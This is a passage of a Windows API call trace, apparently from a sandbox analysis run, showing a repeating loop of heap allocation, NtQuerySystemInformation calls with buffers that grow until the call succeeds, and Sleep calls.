returned 0x29585b8 [0227.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.025] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.025] Sleep (dwMilliseconds=0x110) [0227.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.035] Sleep (dwMilliseconds=0x110) [0227.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.048] Sleep (dwMilliseconds=0x110) [0227.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.063] Sleep (dwMilliseconds=0x110) [0227.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.084] Sleep (dwMilliseconds=0x110) [0227.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.094] Sleep (dwMilliseconds=0x110) [0227.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.112] Sleep (dwMilliseconds=0x110) [0227.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.131] Sleep (dwMilliseconds=0x110) [0227.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.144] Sleep (dwMilliseconds=0x110) [0227.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.157] Sleep (dwMilliseconds=0x110) [0227.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.194] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.196] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.196] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.201] Sleep (dwMilliseconds=0x110) [0227.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.220] Sleep (dwMilliseconds=0x110) [0227.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.282] Sleep (dwMilliseconds=0x110) [0227.306] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.306] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.307] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.307] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.307] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.307] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.307] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.308] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.308] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.308] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.308] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.308] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.309] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.310] Sleep (dwMilliseconds=0x110) [0227.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 